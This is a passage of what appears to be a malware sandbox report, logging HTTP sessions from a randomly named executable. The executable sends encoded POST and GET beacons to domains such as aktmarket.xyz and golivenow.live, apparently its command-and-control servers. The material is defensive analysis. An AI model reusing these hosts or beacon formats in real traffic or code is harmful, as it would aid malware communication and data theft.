                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 73 52 45 44 4e 68 2f 59 79 4a 58 41 6b 56 57 4f 4d 59 4d 6b 32 58 62 33 71 70 30 33 4b 58 59 44 6f 43 4a 79 79 38 31 65 51 6f 51 57 4d 46 4a 43 65 39 62 74 4d 37 65 46 54 55 64 6f 32 37 65 30 7a 64 6f 68 76 76 4a 72 2b 6f 70 67 42 73 69 32 4c 35 48 2b 4d 6f 69 4b 58 6e 43 68 38 53 79 54 39 33 6d 55 51 6c 75 4d 75 71 6b 62 42 38 49 39 6a 78 6e 4d 45 53 7a 78 73 2b 6f 54 7a 70 4b 4a 43 56 47 63 38 57 71 43 4b 71 55 51 5a 70 4e 2f 55 61 67 69 45 33 78 41 67 73 4c 49 5a 53 6a 38 57 56 71 43 61 63 6a 57 38 4f 67 52 2f 70 62 65 4d 55 66
                                                        Data Ascii: OVldGJw=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4sREDNh/YyJXAkVWOMYMk2Xb3qp03KXYDoCJyy81eQoQWMFJCe9btM7eFTUdo27e0zdohvvJr+opgBsi2L5H+MoiKXnCh8SyT93mUQluMuqkbB8I9jxnMESzxs+oTzpKJCVGc8WqCKqUQZpN/UagiE3xAgsLIZSj8WVqCacjW8OgR/pbeMUf
                                                        Dec 14, 2024 13:58:22.614831924 CET73INHTTP/1.1 405 Method Not Allowed
                                                        content-length: 0
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.54996813.248.169.48803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:24.206391096 CET1716OUTPOST /wb7v/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.aktmarket.xyz
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1244
                                                        Origin: http://www.aktmarket.xyz
                                                        Referer: http://www.aktmarket.xyz/wb7v/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 46 43 63 36 45 31 36 6c 7a 32 4c 51 38 53 63 4f 6c 34 4f 4f 46 53 6d 72 37 6e 75 67 47 31 2f 30 58 48 6d 61 55 41 75 48 34 76 78 45 43 2b 70 2f 58 78 68 58 44 6b 56 57 48 73 59 4a 6b 32 58 47 33 71 78 77 33 4b 61 74 44 72 71 4a 6a 67 30 31 59 6a 77 51 50 63 46 4a 64 4f 39 59 31 73 37 50 46 54 6b 52 6f 32 4c 65 30 7a 64 6f 68 73 33 4a 73 76 6f 70 69 42 74 51 68 37 35 39 76 63 6f 61 4b 58 65 67 68 38 57 45 54 4e 58 6d 58 78 4a 75 66 73 53 6b 57 42 38 4b 36 6a 77 30 4d 45 57 38 78 73 79 65 54 7a 30 58 4a 41 46 47 4d 62 48 72 59 35 71 79 4b 2f 35 70 7a 58 75 6b 79 43 76 52 43 43 55 4d 4a 35 58 43 36 43 52 32 49 76 5a 75 54 4f 47 70 54 4c 6b 4a 62 4c 4e 35 6d 69 63 78 37 69 43 6c 6c 70 47 46 78 33 4b 42 2b 72 4e 75 6a 4e 47 56 7a 2f 31 6b 31 34 76 47 2b 42 33 71 74 31 41 58 72 55 42 56 66 66 79 62 74 30 61 6d 44 4f 34 73 50 49 4c 63 62 6d 79 54 32 73 38 7a 56 54 72 39 46 44 79 50 68 59 61 39 70 4d 63 31 4a 46 45 48 6a 6e 64 54 6b 78 64 39 63 68 39 65 39 53 6d 75 34 70 6b 6a 47 7a [TRUNCATED]
                                                        Data Ascii: OVldGJw=FCc6E16lz2LQ8ScOl4OOFSmr7nugG1/0XHmaUAuH4vxEC+p/XxhXDkVWHsYJk2XG3qxw3KatDrqJjg01YjwQPcFJdO9Y1s7PFTkRo2Le0zdohs3JsvopiBtQh759vcoaKXegh8WETNXmXxJufsSkWB8K6jw0MEW8xsyeTz0XJAFGMbHrY5qyK/5pzXukyCvRCCUMJ5XC6CR2IvZuTOGpTLkJbLN5micx7iCllpGFx3KB+rNujNGVz/1k14vG+B3qt1AXrUBVffybt0amDO4sPILcbmyT2s8zVTr9FDyPhYa9pMc1JFEHjndTkxd9ch9e9Smu4pkjGzMMbZLV9rnpR+Uuab1yf6YRExCUtr8K+v5Nd67JyY9fSefxi7piYh0Wu3I4WDHuNTkLMzayTPIo8lxWnfQYlMuP4hgyKvJOIqeKyAh8mKK65iO5AJ6/clRi+90HleazodkrtNVWBiWa3iz6rNFbVnfdsN5PJkls2Nih5tVYDOf00lOLmmJBaPmFO/pT05UMrQDu+I+KlxmI8KM6l5qOSpkT+yA2sEjLRwpfBirIguybS3fLY9WLP83WRBg77I0/1h65HmIYjDrwD5rpqJ2G5JsSan4DE3PgmD7DFfdJrnHkq1Mun6/donfHTfwXuXHBXewQN4VyvwRRiAsYfkpgBsHqWiMrC87dS7oSUrRLqA+QlQ6q/E+cJY8vyzWHFJgS7T20Q5YTGhU8nStpSOiF9kPlk7nXYwIjCpsf1hHHmSfNTYHclwJjmIYigaA7+FNkobjFQ32f/x4JMrAQQs7Oft5gcqlhDTn50nyqCgS8iseizfHFcFy1PJ3Fuuho8Bhw1opuce97mtXqRJRfjylT5mpJ7ih5EzPtLhV/BHviKNxi+/RlzDr7f/ErVMDnzhWf8plTiSIbcdf1WCWLRZ8j9Cs2mQA/xcVK1WibDfhllSrGXZIMcMlzoypYL/+/jU5HVKyHn/eMznN7eaK6JzFxltxBCpEYm31WWOfa [TRUNCATED]
                                                        Dec 14, 2024 13:58:25.287416935 CET73INHTTP/1.1 405 Method Not Allowed
                                                        content-length: 0
                                                        connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.54997413.248.169.48803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:26.876534939 CET424OUTGET /wb7v/?OVldGJw=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPYotf4JfrOn9OzIPvHr8twMpt9nvqMMqsQkOmIpHnfRVOQ==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.aktmarket.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Dec 14, 2024 13:58:27.974051952 CET396INHTTP/1.1 200 OK
                                                        content-type: text/html
                                                        date: Sat, 14 Dec 2024 12:58:27 GMT
                                                        content-length: 275
                                                        connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 56 6c 64 47 4a 77 3d 49 41 30 61 48 41 4b 66 77 31 44 49 37 42 63 59 35 37 2f 52 61 43 4f 32 70 58 79 41 47 30 62 49 4a 68 69 6f 5a 67 72 44 67 74 70 72 56 2b 64 46 65 41 35 31 64 32 34 2f 42 73 77 52 6b 7a 7a 59 39 64 56 6b 71 61 36 6c 50 37 71 6f 2f 53 45 39 5a 42 77 4e 50 59 6f 74 66 34 4a 66 72 4f 6e 39 4f 7a 49 50 76 48 72 38 74 77 4d 70 74 39 6e 76 71 4d 4d 71 73 51 6b 4f 6d 49 70 48 6e 66 52 56 4f 51 3d 3d 26 4f 50 3d 51 58 5a 50 77 44 4e 48 30 42 47 30 74 74 64 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?OVldGJw=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPYotf4JfrOn9OzIPvHr8twMpt9nvqMMqsQkOmIpHnfRVOQ==&OP=QXZPwDNH0BG0ttd0"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.54999066.29.149.46803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:33.613781929 CET682OUTPOST /r2k9/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.golivenow.live
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 208
                                                        Origin: http://www.golivenow.live
                                                        Referer: http://www.golivenow.live/r2k9/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 2b 72 49 48 4a 79 37 47 4a 62 37 72 35 57 39 54 30 2f 7a 73 36 2f 59 6a 51 76 68 74 67 4c 34 46 67 59 57 59 56 78 76 47 56 50 65 64 37 70 47 57 73 34 35 43 4b 77 7a 61 72 52 51 2f 4d 50 56 61 50 5a 4e 30 38 4a 6f 64 79 52 57 2b 2f 55 67 67 4f 37 50 2b 57 43 37 4a 5a 6d 38 59 42 35 57 4e 64 73 71 6c 69 50 38 52 36 7a 55 4b 73 42 66 6e 69 71 61 79 79 4b 36 48 39 34 61 2b 62 6a 34 54 72 76 39 55 56 43 38 65 78 6e 48 6c 74 4f 34 2f 52 41 53 74 50 64 44 4b 74 6b 75 65 71 76 66 55 6a 34 56 41 42 62 4b 34 71 56 37 4a 54 52 59 72 51 47 55 41 79 6b 62 65 2f 45 49 3d
                                                        Data Ascii: OVldGJw=c+e6HpKRV8z2+rIHJy7GJb7r5W9T0/zs6/YjQvhtgL4FgYWYVxvGVPed7pGWs45CKwzarRQ/MPVaPZN08JodyRW+/UggO7P+WC7JZm8YB5WNdsqliP8R6zUKsBfniqayyK6H94a+bj4Trv9UVC8exnHltO4/RAStPdDKtkueqvfUj4VABbK4qV7JTRYrQGUAykbe/EI=
                                                        Dec 14, 2024 13:58:34.845520973 CET637INHTTP/1.1 404 Not Found
                                                        Date: Sat, 14 Dec 2024 12:58:34 GMT
                                                        Server: Apache
                                                        Content-Length: 493
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.54999166.29.149.46803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:36.289052963 CET702OUTPOST /r2k9/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.golivenow.live
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 228
                                                        Origin: http://www.golivenow.live
                                                        Referer: http://www.golivenow.live/r2k9/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 51 46 68 38 47 59 50 31 44 47 57 50 65 64 6a 35 48 53 68 59 35 7a 4b 78 4f 70 72 54 45 2f 4d 50 42 61 50 5a 64 30 39 34 6f 65 79 42 57 34 30 30 67 69 51 4c 50 2b 57 43 37 4a 5a 6d 34 6d 42 35 75 4e 64 38 61 6c 68 71 63 51 35 7a 55 4c 74 42 66 6e 6d 71 61 32 79 4b 37 39 39 35 32 59 62 68 77 54 72 71 35 55 55 57 67 5a 71 58 48 5a 70 4f 34 6f 58 68 72 56 42 64 62 46 78 43 6e 35 71 50 61 67 76 75 6b 71 62 35 43 51 35 31 58 78 44 43 51 63 42 32 31 70 6f 48 4c 75 68 54 65 48 57 71 41 56 72 49 6b 53 51 6e 44 34 53 2f 67 59 47 42 2b 7a
                                                        Data Ascii: OVldGJw=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdQFh8GYP1DGWPedj5HShY5zKxOprTE/MPBaPZd094oeyBW400giQLP+WC7JZm4mB5uNd8alhqcQ5zULtBfnmqa2yK79952YbhwTrq5UUWgZqXHZpO4oXhrVBdbFxCn5qPagvukqb5CQ51XxDCQcB21poHLuhTeHWqAVrIkSQnD4S/gYGB+z
                                                        Dec 14, 2024 13:58:37.513147116 CET637INHTTP/1.1 404 Not Found
                                                        Date: Sat, 14 Dec 2024 12:58:37 GMT
                                                        Server: Apache
                                                        Content-Length: 493
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.54999266.29.149.46803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:38.955112934 CET1719OUTPOST /r2k9/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.golivenow.live
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1244
                                                        Origin: http://www.golivenow.live
                                                        Referer: http://www.golivenow.live/r2k9/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 63 2b 65 36 48 70 4b 52 56 38 7a 32 6b 49 67 48 47 78 6a 47 4d 37 37 71 6c 47 39 54 39 66 7a 6f 36 2f 63 6a 51 74 52 39 67 64 6f 46 68 4c 75 59 56 55 44 47 58 50 65 64 39 70 48 52 68 59 35 55 4b 77 6d 6c 72 54 49 46 4d 4d 35 61 4f 36 6c 30 73 36 41 65 39 42 57 34 70 6b 67 6e 4f 37 50 52 57 43 4b 41 5a 6d 49 6d 42 35 75 4e 64 2f 43 6c 31 76 38 51 2f 7a 55 4b 73 42 65 6d 69 71 61 65 79 4b 69 66 39 35 79 75 62 56 38 54 6f 4b 4a 55 57 6a 38 5a 33 6e 48 66 6e 75 35 74 58 67 58 4b 42 64 33 2f 78 43 36 63 71 4e 4b 67 71 49 39 6e 50 38 69 6d 71 6e 62 53 44 6c 45 44 63 43 78 57 77 57 2f 6c 72 54 48 68 4b 62 67 68 75 66 4e 66 47 55 36 51 41 4a 4d 73 42 33 50 51 6a 56 44 34 32 78 6f 64 43 43 58 35 4d 46 46 7a 6d 4f 49 52 43 57 48 56 44 63 58 31 75 67 39 48 37 4a 45 49 31 61 71 64 73 32 74 2b 2b 66 75 57 77 76 33 72 78 64 6e 5a 70 33 6a 5a 66 41 73 50 53 47 67 33 76 4a 4e 35 44 51 59 6e 54 7a 47 56 5a 70 57 39 52 4e 49 30 74 6b 50 59 35 42 71 44 6d 61 62 38 69 79 6d 51 37 68 6c 50 67 55 [TRUNCATED]
                                                        Data Ascii: OVldGJw=c+e6HpKRV8z2kIgHGxjGM77qlG9T9fzo6/cjQtR9gdoFhLuYVUDGXPed9pHRhY5UKwmlrTIFMM5aO6l0s6Ae9BW4pkgnO7PRWCKAZmImB5uNd/Cl1v8Q/zUKsBemiqaeyKif95yubV8ToKJUWj8Z3nHfnu5tXgXKBd3/xC6cqNKgqI9nP8imqnbSDlEDcCxWwW/lrTHhKbghufNfGU6QAJMsB3PQjVD42xodCCX5MFFzmOIRCWHVDcX1ug9H7JEI1aqds2t++fuWwv3rxdnZp3jZfAsPSGg3vJN5DQYnTzGVZpW9RNI0tkPY5BqDmab8iymQ7hlPgU7R0Y3MW2DrsUOu+vlQ8YhNLlgXE0DnqScyH8j00D1jbtRzHdhaxooalbryYeznwMnOBNB7WikA2Ux5X6XZXbgpnHUeolYZfRpPnr7MiQ2KXMC3dFvQf98gTwYoMBXPHQjVrI/lnY800bU86vqLB4cmLzIvIBoB2fOJNmyJmJWSyrz+7YSrlc6Yo/IBmW5LC7sNjNpT1gH8fyA85EbztFdGTEG1exP0B5notOoLzTV5+RtF/DCdEJM6qLoTrEOHg0USkDn1fr+oZwkpuKN17NI9aSoGFKAVsaik9lKuNaWmf/RQikSbY+XoJExnWvO7OP1H5J3z0TOi6hJQkhBVNj4o47iBOSPLuUMtsXplbc02rUJWFwsNl0SX3vrf6fbkDHq6zcJqb5ZTiCuZcG+UvJU/6Na1dWa7DurkLwPajs+p0g9EQfJl+c9qRJk+dlkJh8vqaralmQqcW/vBWE2TV3iUsQwYS7mQ+HtW/QbZj18h730FL+xgwIZFUbq9v64UmzZp9JOs+0xPl+ViWIN2l8+ToVB087w65oNaZfzrvbAK5rpT3dmtpbASQz1yV93rNLb2KGQXMjKlrawuu9Ag0AMg6z/kmUOoyHnQHkUWIXAXk1Dm5Sbnlzcrpm6XcTmT8TYeUj2/9EiGY2S3i5lrwaIrxdrtPSsub+C4 [TRUNCATED]
                                                        Dec 14, 2024 13:58:40.246109009 CET637INHTTP/1.1 404 Not Found
                                                        Date: Sat, 14 Dec 2024 12:58:39 GMT
                                                        Server: Apache
                                                        Content-Length: 493
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.54999366.29.149.46803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:41.622231960 CET425OUTGET /r2k9/?OVldGJw=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z7RTC1iZ1X4n/KUn3ZXo+XObiNOSg7uRc4jNKlD6GoMPhtg==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.golivenow.live
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Dec 14, 2024 13:58:42.855201960 CET652INHTTP/1.1 404 Not Found
                                                        Date: Sat, 14 Dec 2024 12:58:42 GMT
                                                        Server: Apache
                                                        Content-Length: 493
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.5499943.33.130.190803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:58:48.500756025 CET676OUTPOST /rbqc/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.iglpg.online
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 208
